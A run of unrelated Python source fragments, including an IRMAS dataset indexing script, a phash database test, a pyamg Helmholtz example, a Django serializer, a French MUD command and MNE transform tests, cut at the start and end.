    with open(file_path, 'rb') as fhandle:
        for chunk in iter(lambda: fhandle.read(4096), b''):
            hash_md5.update(chunk)
    return hash_md5.hexdigest()


def strip_first_dir(full_path):
    return os.path.join(*(full_path.split(os.path.sep)[1:]))


def make_irmas_index(irmas_data_path):
    count = 0
    irmas_dict = dict()
    for root, dirs, files in os.walk(irmas_data_path):
        for directory in dirs:
            if 'Train' in directory:
                for root_, dirs_, files_ in os.walk(
                    os.path.join(irmas_data_path, directory)
                ):
                    for directory_ in dirs_:
                        for root__, dirs__, files__ in os.walk(
                            os.path.join(irmas_data_path, directory, directory_)
                        ):
                            for file in files__:
                                if file.endswith('.wav'):
                                    if 'dru' in file:
                                        irmas_id_dru = file.split(']')[3]  # Obtain id
                                        irmas_id_dru_no_wav = irmas_id_dru.split('.')[
                                            0
                                        ]  # Obtain id without '.wav'
                                        irmas_dict[irmas_id_dru_no_wav] = os.path.join(
                                            directory, directory_, file
                                        )
                                    if 'nod' in file:
                                        irmas_id_nod = file.split(']')[3]  # Obtain id
                                        irmas_id_nod_no_wav = irmas_id_nod.split('.')[
                                            0
                                        ]  # Obtain id without '.wav'
                                        irmas_dict[irmas_id_nod_no_wav] = os.path.join(
                                            directory, directory_, file
                                        )
                                    else:
                                        irmas_id = file.split(']')[2]  # Obtain id
                                        irmas_id_no_wav = irmas_id.split('.')[
                                            0
                                        ]  # Obtain id without '.wav'
                                        irmas_dict[irmas_id_no_wav] = os.path.join(
                                            directory, directory_, file
                                        )

    irmas_test_dict = dict()
    for root, dirs, files in os.walk(irmas_data_path):
        for directory in dirs:
            if 'Test' in directory:
                for root_, dirs_, files_ in os.walk(
                    os.path.join(irmas_data_path, directory)
                ):
                    for directory_ in dirs_:
                        for root__, dirs__, files__ in os.walk(
                            os.path.join(irmas_data_path, directory, directory_)
                        ):
                            for file in files__:
                                if file.endswith('.wav'):
                                    file_name = os.path.join(
                                        directory, directory_, file
                                    )
                                    track_name = str(file_name.split('.wa')[0]) + '.txt'
                                    irmas_test_dict[count] = [file_name, track_name]
                                    count += 1

    irmas_id_list = sorted(irmas_dict.items())  # Sort strokes by id

    irmas_index = {}
    for inst in irmas_id_list:
        print(inst[1])
        audio_checksum = md5(os.path.join(irmas_data_path, inst[1]))

        irmas_index[inst[0]] = {
            'audio': (inst[1], audio_checksum),
            'annotation': (inst[1], audio_checksum),
        }

    index = 1
    for inst in irmas_test_dict.values():
        audio_checksum = md5(os.path.join(irmas_data_path, inst[0]))
        annotation_checksum = md5(os.path.join(irmas_data_path, inst[1]))

        irmas_index[index] = {
            'audio': (inst[0], audio_checksum),
            'annotation': (inst[1], annotation_checksum),
        }
        index += 1

    with open(IRMAS_INDEX_PATH, 'w') as fhandle:
        json.dump(irmas_index, fhandle, indent=2)


def make_irmas_test_index(irmas_data_path):
    count = 1
    irmas_dict = dict()
    for root, dirs, files in os.walk(irmas_data_path):
        for directory in dirs:
            if 'Test' in directory:
                for root_, dirs_, files_ in os.walk(
                    os.path.join(irmas_data_path, directory)
                ):
                    for directory_ in dirs_:
                        for root__, dirs__, files__ in os.walk(
                            os.path.join(irmas_data_path, directory, directory_)
                        ):
                            for file in files__:
                                if file.endswith('.wav'):
                                    file_name = os.path.join(
                                        directory, directory_, file
                                    )
                                    track_name = str(file_name.split('.wa')[0]) + '.txt'
                                    irmas_dict[count] = [file_name, track_name]
                                    count += 1

    irmas_index = {}
    index = 1
    for inst in irmas_dict.values():
        audio_checksum = md5(os.path.join(irmas_data_path, inst[0]))
        annotation_checksum = md5(os.path.join(irmas_data_path, inst[1]))

        irmas_index[index] = {
            'audio': (inst[0], audio_checksum),
            'annotation': (inst[1], annotation_checksum),
        }
        index += 1

    with open(IRMAS_TEST_INDEX_PATH, 'w') as fhandle:
        json.dump(irmas_index, fhandle, indent=2)


def main(args):
    make_irmas_index(args.irmas_data_path)
    # make_irmas_test_index(args.irmas_data_path)


if __name__ == '__main__':
    PARSER = argparse.ArgumentParser(description='Make IRMAS index file.')
    PARSER.add_argument('irmas_data_path', type=str, help='Path to IRMAS data folder.')

    main(PARSER.parse_args())


import unittest
import time
import pprint
import logging
import scanner.logSetup as logSetup

import pyximport
print("Have Cython")
pyximport.install()

import dbPhashApi




class TestCompareDatabaseInterface(unittest.TestCase):

	def __init__(self, *args, **kwargs):
		logSetup.initLogging()
		super().__init__(*args, **kwargs)

	def setUp(self):
		# We set up and tear down the tree a few times to validate the dropTree function
		self.log = logging.getLogger("Main.TestCompareDatabaseInterface")

		self.tree = dbPhashApi.PhashDbApi()
		self.tree.forceReload()

	def dist_check(self, distance, dbid, phash):

		qtime1 = time.time()
		have1 = self.tree.getWithinDistance_db(phash, distance=distance)
		qtime2 = time.time()
		qtime3 = time.time()
		have2 = self.tree.getIdsWithinDistance(phash, distance=distance)
		qtime4 = time.time()


		# print(dbid, have1)
		if have1 != have2:
			self.log.error("Mismatch!")
			for line in pprint.pformat(have1).split("\n"):
				self.log.error(line)
			for line in pprint.pformat(have2).split("\n"):
				self.log.error(line)

		self.assertTrue(dbid in have1)
		self.assertTrue(dbid in have2)
		self.assertEqual(have1, have2)

		self.log.info('Dist %s %s, %s', distance, qtime2-qtime1, qtime4-qtime3)


	def test_0(self):
		rand_r = self.tree.getRandomPhashRows(0.001)
		self.log.info("Have %s items to test with", len(rand_r))

		stepno = 0
		for dbid, phash in rand_r:
			self.dist_check(1, dbid, phash)
			self.dist_check(2, dbid, phash)
			self.dist_check(3, dbid, phash)
			self.dist_check(4, dbid, phash)
			self.dist_check(5, dbid, phash)
			self.dist_check(6, dbid, phash)
			self.dist_check(7, dbid, phash)
			self.dist_check(8, dbid, phash)
			stepno += 1
			self.log.info("On step %s of %s", stepno, len(rand_r))

from numpy import array, zeros, ones, sqrt, ravel, mod, random, inner, conjugate
from scipy.sparse import csr_matrix, csc_matrix, coo_matrix, bmat, eye
from scipy import rand, mat, real, imag, linspace, hstack, vstack, exp, cos, sin, pi
from pyamg.util.linalg import norm
import pyamg
from scipy.optimize import fminbound, fmin

__all__ = ['one_D_helmholtz', 'min_wave']

def min_wave(A, omega, x, tol=1e-5, maxiter=25):
    '''

    parameters
    ----------
    A {matrix}
        1D Helmholtz Operator
    omega {scalar}
        Wavenumber used to discretize Helmholtz problem
    x {array}
        1D mesh for the problem
    tol {scalar}
        minimization tolerance
    maxit {integer}
        maximum iters for minimization algorithm

    returns
    -------
    Applies minimization algorithm to find numerically lowest energy wavenumber
    for the matrix A, i.e., the omega shift that minimizes <Ac, c> / <c, c>, 
    for c = cosine((omega+shift)x)
    
    '''

    x = ravel(x)

    # Define scalar objective function, ignoring the 
    # boundaries by only considering A*c at [1:-1]
    def obj_fcn(alpha):
        c = cos((omega+alpha)*x)
        Ac = (A*c)[1:-1]
        return norm(Ac)/norm(c[1:-1])
    
    (xopt, fval, ierr, numfunc) = fminbound(obj_fcn, -0.99*omega, \
         0.99*omega, xtol=tol, maxfun=maxiter, full_output=True, disp=0)
    
    #print "Minimizer = %1.4f,  Function Value at Min = %1.4e\nError Flag = %d,\
    #        Number of function evals = %d" % (xopt, fval, ierr, numfunc)
    
    return xopt

def one_D_helmholtz(h, omega=1.0, nplane_waves=2):
    '''

    parameters
    ----------
    h {int}
        Number of grid spacings for 1-D Helmholtz
    omega {float}
        Defines Helmholtz wave number
    nplane_waves {int}
        Defines the number of planewaves used for the near null-space modes, B.
        1: B = [ exp(ikx) ]
        2: B = [ real(exp(ikx)), complex(exp(ikx)) ]

    returns
    -------
    dictionary containing: 
    
    A {matrix-like}
        LHS of linear system for Helmholtz problem,
        -laplace(u) - omega^2 u = f
    mesh_h {float}
        mesh size
    vertices {array-like}
        [X, Y] 
    elements {None}
        None, just using 1-D finite-differencing 

    '''
    
    # Ensure Repeatability of "random" initial guess
    random.seed(10)

    # Mesh Spacing
    mesh_h = 1.0/(float(h)-1.0)        
    
    # Construct Real Operator
    reA = pyamg.gallery.poisson( (h,), format='csr')
    reA = reA - mesh_h*mesh_h*omega*omega*\
          eye(reA.shape[0], reA.shape[1], format='csr')
    dimen = reA.shape[0]
    
    # Construct Imaginary Operator
    imA = csr_matrix( coo_matrix( (array([2.0*mesh_h*omega]), \
                    (array([0]), array([0]))), shape=reA.shape) )

    # Enforce Radiation Boundary Conditions at first grid point
    reA.data[1] = -2.0
    
    # In order to maintain symmetry scale the first equation by 1/2
    reA.data[0] = 0.5*reA.data[0]
    reA.data[1] = 0.5*reA.data[1]
    imA.data[0] = 0.5*imA.data[0]

    # Create complex-valued system
    complexA = reA + 1.0j*imA
    
    # For this case, the CG (continuous Galerkin) case is the default elements and vertices
    # because there is no DG mesh to speak of
    elements = None
    vertices = hstack((linspace(-1.0,1.0,h).reshape(-1,1), zeros((h,1))))
    
    # Near null-space modes are 1-D Plane waves: [exp(ikx), i exp(ikx)]
    B = zeros( (dimen, nplane_waves), dtype=complex )
    shift = min_wave(complexA, omega, vertices[:,0], tol=1e-9, maxiter=15)
    if nplane_waves == 1:
        B[:,0] = exp(1.0j*(omega+shift)*vertices[:,0])
    elif nplane_waves == 2:
        B[:,0] = cos((omega+shift)*vertices[:,0])
        B[:,1] = sin((omega+shift)*vertices[:,0])
        
    return {'A' : complexA, 'B' : B, 'mesh_h' : mesh_h, \
            'elements' : elements, 'vertices' : vertices}




from bluebottle.projects.serializers import ProjectPreviewSerializer
from bluebottle.quotes.serializers import QuoteSerializer
from bluebottle.slides.serializers import SlideSerializer
from bluebottle.statistics.serializers import StatisticSerializer
from rest_framework import serializers


class HomePageSerializer(serializers.Serializer):
    id = serializers.CharField()
    quotes = QuoteSerializer(many=True)
    slides = SlideSerializer(many=True)
    statistics = StatisticSerializer(many=True)
    projects = ProjectPreviewSerializer(many=True)

# -*-coding:Utf-8 -*

# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
# 
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 
# * Redistributions of source code must retain the above copyright notice, this
#   list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
#   this list of conditions and the following disclaimer in the documentation
#   and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
#   may be used to endorse or promote products derived from this software
#   without specific prior written permission.
# 
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.


"""Package contenant la commande 'scripting alerte info'."""

from primaires.interpreteur.masque.parametre import Parametre
from primaires.format.fonctions import echapper_accolades
from primaires.format.date import get_date

class PrmInfo(Parametre):
    
    """Commande 'scripting alerte info'"""
    
    def __init__(self):
        """Constructeur du paramètre."""
        Parametre.__init__(self, "info", "info")
        self.schema = "<nombre>"
        self.aide_courte = "affiche des informations sur l'alerte"
        self.aide_longue = \
            "Affiche des informations sur l'alerte permettant de la corriger."
    
    def interpreter(self, personnage, dic_masques):
        """Méthode d'interprétation de commande"""
        nombre = dic_masques["nombre"].nombre
        try:
            alerte = type(self).importeur.scripting.alertes[nombre]
        except KeyError:
            personnage << "|err|Ce numéro d'alerte est invalide.|ff|"
        else:
            msg = "Informations sur l'alerte {} :".format(alerte.no)
            msg += "\n  S'est produit sur {} {}".format(alerte.type,
                    alerte.objet) + " " + get_date(alerte.date.timetuple())
            msg += "\n  Evenement {}, test {}, ligne {}".format(
                    alerte.evenement, echapper_accolades(alerte.test),
                    alerte.no_ligne)
            msg += "\n      {}\n".format(echapper_accolades(alerte.ligne))
            msg += "\n  Message d'erreur : |err|{}|ff|".format(
                    echapper_accolades(alerte.message))
            if personnage.nom_groupe == "administrateur":
                msg += "\n  Traceback Python :\n  {}".format(
                        echapper_accolades(alerte.traceback))
            
            personnage << msg

#!/usr/bin/env python3
# -*- coding: utf-8 -*-


def helloworld():
    """
    Hello world routine !
    """
    print("Hello world!")

import os
import os.path as op

import pytest
import numpy as np
from numpy.testing import (assert_array_equal, assert_equal, assert_allclose,
                           assert_array_less, assert_almost_equal)
import itertools

import mne
from mne.datasets import testing
from mne.fixes import _get_img_fdata
from mne import read_trans, write_trans
from mne.io import read_info
from mne.transforms import (invert_transform, _get_trans,
                            rotation, rotation3d, rotation_angles, _find_trans,
                            combine_transforms, apply_trans, translation,
                            get_ras_to_neuromag_trans, _pol_to_cart,
                            quat_to_rot, rot_to_quat, _angle_between_quats,
                            _find_vector_rotation, _sph_to_cart, _cart_to_sph,
                            _topo_to_sph, _average_quats,
                            _SphericalSurfaceWarp as SphericalSurfaceWarp,
                            rotation3d_align_z_axis, _read_fs_xfm,
                            _write_fs_xfm, _quat_real, _fit_matched_points,
                            _quat_to_euler, _euler_to_quat,
                            _quat_to_affine, _compute_r2, _validate_pipeline)
from mne.utils import requires_nibabel, requires_dipy

data_path = testing.data_path(download=False)
fname = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-trans.fif')
fname_eve = op.join(data_path, 'MEG', 'sample',
                    'sample_audvis_trunc_raw-eve.fif')
subjects_dir = op.join(data_path, 'subjects')
fname_t1 = op.join(subjects_dir, 'fsaverage', 'mri', 'T1.mgz')

base_dir = op.join(op.dirname(__file__), '..', 'io', 'tests', 'data')
fname_trans = op.join(base_dir, 'sample-audvis-raw-trans.txt')
test_fif_fname = op.join(base_dir, 'test_raw.fif')
ctf_fname = op.join(base_dir, 'test_ctf_raw.fif')
hp_fif_fname = op.join(base_dir, 'test_chpi_raw_sss.fif')


def test_tps():
    """Test TPS warping."""
    az = np.linspace(0., 2 * np.pi, 20, endpoint=False)
    pol = np.linspace(0, np.pi, 12)[1:-1]
    sph = np.array(np.meshgrid(1, az, pol, indexing='ij'))
    sph.shape = (3, -1)
    assert_equal(sph.shape[1], 200)
    source = _sph_to_cart(sph.T)
    destination = source.copy()
    destination *= 2
    destination[:, 0] += 1
    # fit with 100 points
    warp = SphericalSurfaceWarp()
    assert 'no ' in repr(warp)
    warp.fit(source[::3], destination[::2])
    assert 'oct5' in repr(warp)
    destination_est = warp.transform(source)
    assert_allclose(destination_est, destination, atol=1e-3)


@testing.requires_testing_data
def test_get_trans():
    """Test converting '-trans.txt' to '-trans.fif'."""
    trans = read_trans(fname)
    trans = invert_transform(trans)  # starts out as head->MRI, so invert
    trans_2 = _get_trans(fname_trans)[0]
    assert trans.__eq__(trans_2, atol=1e-5)


@testing.requires_testing_data
def test_io_trans(tmpdir):
    """Test reading and writing of trans files."""
    tempdir = str(tmpdir)
    os.mkdir(op.join(tempdir, 'sample'))
    pytest.raises(RuntimeError, _find_trans, 'sample', subjects_dir=tempdir)
    trans0 = read_trans(fname)
    fname1 = op.join(tempdir, 'sample', 'test-trans.fif')
    trans0.save(fname1)
    assert fname1 == _find_trans('sample', subjects_dir=tempdir)
    trans1 = read_trans(fname1)

    # check all properties
    assert trans0 == trans1

    # check reading non -trans.fif files
    pytest.raises(IOError, read_trans, fname_eve)

    # check warning on bad filenames
    fname2 = op.join(tempdir, 'trans-test-bad-name.fif')
    with pytest.warns(RuntimeWarning, match='-trans.fif'):
        write_trans(fname2, trans0)


def test_get_ras_to_neuromag_trans():
    """Test the coordinate transformation from ras to neuromag."""
    # create model points in neuromag-like space
    rng = np.random.RandomState(0)
    anterior = [0, 1, 0]
    left = [-1, 0, 0]
    right = [.8, 0, 0]
    up = [0, 0, 1]
    rand_pts = rng.uniform(-1, 1, (3, 3))
    pts = np.vstack((anterior, left, right, up, rand_pts))

    # change coord system
    rx, ry, rz, tx, ty, tz = rng.uniform(-2 * np.pi, 2 * np.pi, 6)
    trans = np.dot(translation(tx, ty, tz), rotation(rx, ry, rz))
    pts_changed = apply_trans(trans, pts)

    # transform back into original space
    nas, lpa, rpa = pts_changed[:3]
    hsp_trans = get_ras_to_neuromag_trans(nas, lpa, rpa)
    pts_restored = apply_trans(hsp_trans, pts_changed)

    err = "Neuromag transformation failed"
    assert_allclose(pts_restored, pts, atol=1e-6, err_msg=err)


def _cartesian_to_sphere(x, y, z):
    """Convert using old function."""
    hypotxy = np.hypot(x, y)
    r = np.hypot(hypotxy, z)
    elev = np.arctan2(z, hypotxy)
    az = np.arctan2(y, x)
    return az, elev, r


def _sphere_to_cartesian(theta, phi, r):
    """Convert using old function."""
    z = r * np.sin(phi)
    rcos_phi = r * np.cos(phi)
    x = rcos_phi * np.cos(theta)
    y = rcos_phi * np.sin(theta)
    return x, y, z


def test_sph_to_cart():
    """Test conversion between sphere and cartesian."""
    # Simple test, expected value (11, 0, 0)
    r, theta, phi = 11., 0., np.pi / 2.
    z = r * np.cos(phi)
    rsin_phi = r * np.sin(phi)
    x = rsin_phi * np.cos(theta)
    y = rsin_phi * np.sin(theta)
    coord = _sph_to_cart(np.array([[r, theta, phi]]))[0]
    assert_allclose(coord, (x, y, z), atol=1e-7)
    assert_allclose(coord, (r, 0, 0), atol=1e-7)
    rng = np.random.RandomState(0)
    # round-trip test
    coords = rng.randn(10, 3)
    assert_allclose(_sph_to_cart(_cart_to_sph(coords)), coords, atol=1e-5)
    # equivalence tests to old versions
    for coord in coords:
        sph = _cart_to_sph(coord[np.newaxis])
        cart = _sph_to_cart(sph)
        sph_old = np.array(_cartesian_to_sphere(*coord))
        cart_old = _sphere_to_cartesian(*sph_old)
        sph_old[1] = np.pi / 2. - sph_old[1]  # new convention
        assert_allclose(sph[0], sph_old[[2, 0, 1]], atol=1e-7)
        assert_allclose(cart[0], cart_old, atol=1e-7)
        assert_allclose(cart[0], coord, atol=1e-7)


def _polar_to_cartesian(theta, r):
    """Transform polar coordinates to cartesian."""
    x = r * np.cos(theta)
    y = r * np.sin(theta)
    return x, y


def test_polar_to_cartesian():
    """Test helper transform function from polar to cartesian."""
    r = 1
    theta = np.pi
    # expected values are (-1, 0)
    x = r * np.cos(theta)
    y = r * np.sin(theta)
    coord = _pol_to_cart(np.array([[r, theta]]))[0]
    # np.pi is an approx since pi is irrational
    assert_allclose(coord, (x, y), atol=1e-7)
    assert_allclose(coord, (-1, 0), atol=1e-7)
    assert_allclose(coord, _polar_to_cartesian(theta, r), atol=1e-7)
    rng = np.random.RandomState(0)
    r = rng.randn(10)
    theta = rng.rand(10) * (2 * np.pi)
    polar = np.array((r, theta)).T
    assert_allclose([_polar_to_cartesian(p[1], p[0]) for p in polar],
                    _pol_to_cart(polar), atol=1e-7)


def _topo_to_phi_theta(theta, radius):
    """Convert using old function."""
    sph_phi = (0.5 - radius) * 180
    sph_theta = -theta
    return sph_phi, sph_theta


def test_topo_to_sph():
    """Test topo to sphere conversion."""
    rng = np.random.RandomState(0)
    angles = rng.rand(10) * 360
    radii = rng.rand(10)
    angles[0] = 30
    radii[0] = 0.25
    # new way
    sph = _topo_to_sph(np.array([angles, radii]).T)
    new = _sph_to_cart(sph)
    new[:, [0, 1]] = new[:, [1, 0]] * [-1, 1]
    # old way
    for ii, (angle, radius) in enumerate(zip(angles, radii)):
        sph_phi, sph_theta = _topo_to_phi_theta(angle, radius)
        if ii == 0:
            assert_allclose(_topo_to_phi_theta(angle, radius), [45, -30])
        azimuth = sph_theta / 180.0 * np.pi
        elevation = sph_phi / 180.0 * np.pi
        assert_allclose(sph[ii], [1., azimuth, np.pi / 2. - elevation],
                        atol=1e-7)
        r = np.ones_like(radius)
        x, y, z = _sphere_to_cartesian(azimuth, elevation, r)
        pos = [-y, x, z]
        if ii == 0:
            expected = np.array([1. / 2., np.sqrt(3) / 2., 1.])
            expected /= np.sqrt(2)
            assert_allclose(pos, expected, atol=1e-7)
        assert_allclose(pos, new[ii], atol=1e-7)


def test_rotation():
    """Test conversion between rotation angles and transformation matrix."""
    tests = [(0, 0, 1), (.5, .5, .5), (np.pi, 0, -1.5)]
    for rot in tests:
        x, y, z = rot
        m = rotation3d(x, y, z)
        m4 = rotation(x, y, z)
        assert_array_equal(m, m4[:3, :3])
        back = rotation_angles(m)
        assert_almost_equal(actual=back, desired=rot, decimal=12)
        back4 = rotation_angles(m4)
        assert_almost_equal(actual=back4, desired=rot, decimal=12)


def test_rotation3d_align_z_axis():
    """Test rotation3d_align_z_axis."""
    # The more complex z axis fails the assert presumably due to tolerance
    #
    inp_zs = [[0, 0, 1], [0, 1, 0], [1, 0, 0], [0, 0, -1],
              [-0.75071668, -0.62183808, 0.22302888]]

    exp_res = [[[1., 0., 0.], [0., 1., 0.], [0., 0., 1.]],
               [[1., 0., 0.], [0., 0., 1.], [0., -1., 0.]],
               [[0., 0., 1.], [0., 1., 0.], [-1., 0., 0.]],
               [[1., 0., 0.], [0., -1., 0.], [0., 0., -1.]],
               [[0.53919688, -0.38169517, -0.75071668],
                [-0.38169517, 0.683832, -0.62183808],
                [0.75071668, 0.62183808, 0.22302888]]]

    for res, z in zip(exp_res, inp_zs):
        assert_allclose(res, rotation3d_align_z_axis(z), atol=1e-7)


@testing.requires_testing_data
def test_combine():
    """Test combining transforms."""
    trans = read_trans(fname)
    inv = invert_transform(trans)
    combine_transforms(trans, inv, trans['from'], trans['from'])
    pytest.raises(RuntimeError, combine_transforms, trans, inv,
                  trans['to'], trans['from'])
    pytest.raises(RuntimeError, combine_transforms, trans, inv,
                  trans['from'], trans['to'])
    pytest.raises(RuntimeError, combine_transforms, trans, trans,
                  trans['from'], trans['to'])


def test_quaternions():
    """Test quaternion calculations."""
    rots = [np.eye(3)]
    for fname in [test_fif_fname, ctf_fname, hp_fif_fname]:
        rots += [read_info(fname)['dev_head_t']['trans'][:3, :3]]
    # nasty numerical cases
    rots += [np.array([
        [-0.99978541, -0.01873462, -0.00898756],
        [-0.01873462, 0.62565561, 0.77987608],
        [-0.00898756, 0.77987608, -0.62587152],
    ])]
    rots += [np.array([
        [0.62565561, -0.01873462, 0.77987608],
        [-0.01873462, -0.99978541, -0.00898756],
        [0.77987608, -0.00898756, -0.62587152],
    ])]
    rots += [np.array([
        [-0.99978541, -0.00898756, -0.01873462],
        [-0.00898756, -0.62587152, 0.77987608],
        [-0.01873462, 0.77987608, 0.62565561],
    ])]
    for rot in rots:
        assert_allclose(rot, quat_to_rot(rot_to_quat(rot)),
                        rtol=1e-5, atol=1e-5)
        rot = rot[np.newaxis, np.newaxis, :, :]
        assert_allclose(rot, quat_to_rot(rot_to_quat(rot)),
                        rtol=1e-5, atol=1e-5)

    # let's make sure our angle function works in some reasonable way
    for ii in range(3):
        for jj in range(3):
            a = np.zeros(3)
            b = np.zeros(3)
            a[ii] = 1.
            b[jj] = 1.
            expected = np.pi if ii != jj else 0.
            assert_allclose(_angle_between_quats(a, b), expected, atol=1e-5)

    y_180 = np.array([[-1, 0, 0], [0, 1, 0], [0, 0, -1.]])
    assert_allclose(_angle_between_quats(rot_to_quat(y_180),
                                         np.zeros(3)), np.pi)
    h_180_attitude_90 = np.array([[0, 1, 0], [1, 0, 0], [0, 0, -1.]])
    assert_allclose(_angle_between_quats(rot_to_quat(h_180_attitude_90),
                                         np.zeros(3)), np.pi)


def test_vector_rotation():
    """Test basic rotation matrix math."""
    x = np.array([1., 0., 0.])
    y = np.array([0., 1., 0.])
    rot = _find_vector_rotation(x, y)
    assert_array_equal(rot,
                       [[0, -1, 0], [1, 0, 0], [0, 0, 1]])
    quat_1 = rot_to_quat(rot)
    quat_2 = rot_to_quat(np.eye(3))
    assert_allclose(_angle_between_quats(quat_1, quat_2), np.pi / 2.)


def test_average_quats():
    """Test averaging of quaternions."""
    sq2 = 1. / np.sqrt(2.)
    quats = np.array([[0, sq2, sq2],
                      [0, sq2, sq2],
                      [0, sq2, 0],
                      [0, 0, sq2],
                      [sq2, 0, 0]], float)
    # In MATLAB:
    # quats = [[0, sq2, sq2, 0]; [0, sq2, sq2, 0];
    #          [0, sq2, 0, sq2]; [0, 0, sq2, sq2]; [sq2, 0, 0, sq2]];
    expected = [quats[0],
                quats[0],
                [0, 0.788675134594813, 0.577350269189626],
                [0, 0.657192299694123, 0.657192299694123],
                [0.100406058540540, 0.616329446922803, 0.616329446922803]]
    # Averaging the first two should give the same thing:
    for lim, ex in enumerate(expected):
        assert_allclose(_average_quats(quats[:lim + 1]), ex, atol=1e-7)
    quats[1] *= -1  # same quaternion (hidden value is zero here)!
    rot_0, rot_1 = quat_to_rot(quats[:2])
    assert_allclose(rot_0, rot_1, atol=1e-7)
    for lim, ex in enumerate(expected):
        assert_allclose(_average_quats(quats[:lim + 1]), ex, atol=1e-7)
    # Assert some symmetry
    count = 0
    extras = [[sq2, sq2, 0]] + list(np.eye(3))
    for quat in np.concatenate((quats, expected, extras)):
        if np.isclose(_quat_real(quat), 0., atol=1e-7):  # can flip sign
            count += 1
            angle = _angle_between_quats(quat, -quat)
            assert_allclose(angle, 0., atol=1e-7)
            rot_0, rot_1 = quat_to_rot(np.array((quat, -quat)))
            assert_allclose(rot_0, rot_1, atol=1e-7)
    assert count == 4 + len(extras)


@testing.requires_testing_data
@pytest.mark.parametrize('subject', ('fsaverage', 'sample'))
def test_fs_xfm(subject, tmpdir):
    """Test reading and writing of Freesurfer transforms."""
    fname = op.join(data_path, 'subjects', subject, 'mri', 'transforms',
                    'talairach.xfm')
    xfm, kind = _read_fs_xfm(fname)
    if subject == 'fsaverage':
        assert_allclose(xfm, np.eye(4), atol=1e-5)  # fsaverage is in MNI
    assert kind == 'MNI Transform File'
    tempdir = str(tmpdir)
    fname_out = op.join(tempdir, 'out.xfm')
    _write_fs_xfm(fname_out, xfm, kind)
    xfm_read, kind_read = _read_fs_xfm(fname_out)
    assert kind_read == kind
    assert_allclose(xfm, xfm_read, rtol=1e-5, atol=1e-5)
    # Some wacky one
    xfm[:3] = np.random.RandomState(0).randn(3, 4)
    _write_fs_xfm(fname_out, xfm, 'foo')
    xfm_read, kind_read = _read_fs_xfm(fname_out)
    assert kind_read == 'foo'
    assert_allclose(xfm, xfm_read, rtol=1e-5, atol=1e-5)
    # degenerate conditions
    with open(fname_out, 'w') as fid:
        fid.write('foo')
    with pytest.raises(ValueError, match='Failed to find'):
        _read_fs_xfm(fname_out)
    _write_fs_xfm(fname_out, xfm[:2], 'foo')
    with pytest.raises(ValueError, match='Could not find'):
        _read_fs_xfm(fname_out)


@pytest.fixture()
def quats():
    """Make some unit quats."""
    quats = np.random.RandomState(0).randn(5, 3)
    quats[:, 0] = 0  # identity
    quats /= 2 * np.linalg.norm(quats, axis=1, keepdims=True)  # some real part
    return quats


def _check_fit_matched_points(
        p, x, weights, do_scale, angtol=1e-5, dtol=1e-5, stol=1e-7):
    __tracebackhide__ = True
    mne.coreg._ALLOW_ANALITICAL = False
    try:
        params = mne.coreg.fit_matched_points(
            p, x, weights=weights, scale=do_scale, out='params')
    finally:
        mne.coreg._ALLOW_ANALITICAL = True
    quat_an, scale_an = _fit_matched_points(p, x, weights, scale=do_scale)
    assert len(params) == 6 + int(do_scale)
    q_co = _euler_to_quat(params[:3])
    translate_co = params[3:6]
    angle = np.rad2deg(_angle_between_quats(quat_an[:3], q_co))
    dist = np.linalg.norm(quat_an[3:] - translate_co)
    assert 0 <= angle < angtol, 'angle'
    assert 0 <= dist < dtol, 'dist'
    if do_scale:
        scale_co = params[6]
        assert_allclose(scale_an, scale_co, rtol=stol, err_msg='scale')
    # errs
    trans = _quat_to_affine(quat_an)
    trans[:3, :3] *= scale_an
    weights = np.ones(1) if weights is None else weights
    err_an = np.linalg.norm(
        weights[:, np.newaxis] * apply_trans(trans, p) - x)
    trans = mne.coreg._trans_from_params((True, True, do_scale), params)
    err_co = np.linalg.norm(
        weights[:, np.newaxis] * apply_trans(trans, p) - x)
    if err_an > 1e-14:
        assert err_an < err_co * 1.5
    return quat_an, scale_an


@pytest.mark.parametrize('scaling', [0.25, 1])
@pytest.mark.parametrize('do_scale', (True, False))
def test_fit_matched_points(quats, scaling, do_scale):
    """Test analytical least-squares matched point fitting."""
    if scaling != 1 and not do_scale:
        return  # no need to test this, it will not be good
    rng = np.random.RandomState(0)
    fro = rng.randn(10, 3)
    translation = rng.randn(3)
    for qi, quat in enumerate(quats):
        to = scaling * np.dot(quat_to_rot(quat), fro.T).T + translation
        for corrupted in (False, True):
            # mess up a point
            if corrupted:
                to[0, 2] += 100
                weights = np.ones(len(to))
                weights[0] = 0
            else:
                weights = None
            est, scale_est = _check_fit_matched_points(
                fro, to, weights=weights, do_scale=do_scale)
            assert_allclose(scale_est, scaling, rtol=1e-5)
            assert_allclose(est[:3], quat, atol=1e-14)
            assert_allclose(est[3:], translation, atol=1e-14)
        # if we don't adjust for the corruption above, it should get worse
        angle = dist = None
        for weighted in (False, True):
            if not weighted:
                weights = None
                dist_bounds = (5, 20)
                if scaling == 1:
                    angle_bounds = (5, 95)
                    angtol, dtol, stol = 1, 15, 3
                else:
                    angle_bounds = (5, 105)
                    angtol, dtol, stol = 20, 15, 3
            else:
                weights = np.ones(len(to))
                weights[0] = 10  # weighted=True here means "make it worse"
                angle_bounds = (angle, 180)  # unweighted values as new min
                dist_bounds = (dist, 100)
                if scaling == 1:
